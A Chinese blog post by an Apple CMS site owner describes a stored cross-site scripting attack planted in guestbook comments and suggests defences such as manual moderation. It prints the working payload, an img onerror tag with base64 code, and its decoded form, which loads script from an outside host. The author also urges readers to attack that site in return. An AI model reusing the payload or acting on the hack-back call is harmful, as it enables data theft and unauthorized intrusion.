记苹果cms被注入恶意代码

前言

先说结论,攻击者通过在留言区、视频评论区留下一些包含前端代码的内容(类似SQL注入…吧?),当留言或评论被加载时这些代码也会被执行,进而执行一些恶意的js代码,从而获取后台数据等信息。

解决方式

评论、留言区开启人工审核,不要让包含恶意代码的内容加载出来。

正文

最近看后台发现留言管理里面,总有人留下一些无聊的信息,有上千条相同的信息。一开始我以为有人无聊恶作剧,这些内容后面的js代码是我的模板出了什么问题,今天突然心血来潮去看了下发现有点不对劲。这段代码被执行了!!!

如下图,这是评论的内容

后台显示的数据

这是开发者工具中看到的js代码被执行了

前端显示的样子

<img only="1" src="a" onerror="eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3lmam5qYy5jb20vMS8/JytNYXRoLnJhbmRvbSgp'))" style="display:none">

这段代码的意思是插入一个错误链接(必定会加载失败)的图片,在图片加载失败时用atob解码bash64,执行后面的代码。
解码后代码的内容是执行一段js代码,内容如下。这种恶意网站没必要给他打码,有能力的兄弟们直接爆破他。createElement('script');body.appendChild(s);s.src='//yfjnjc.com/1/?'+Math.random();

后记

这个网站的内容如图,本人不怎么擅长js,看不太懂。用AI解释了下,大概就是获取包括后台在内的信息并给他发过去,可以参考下后两张图里AI的解释
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
大家可以看一下自己网站的留言区评论区,如果有类似内容的要及时删除,并建议把后台网址改一下,不要用admin1.php这种简单的地址。同时把留言的审核打开,不要让这种有可趁之机。最后,有能力的大哥可以去给这个网站留点纪念

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值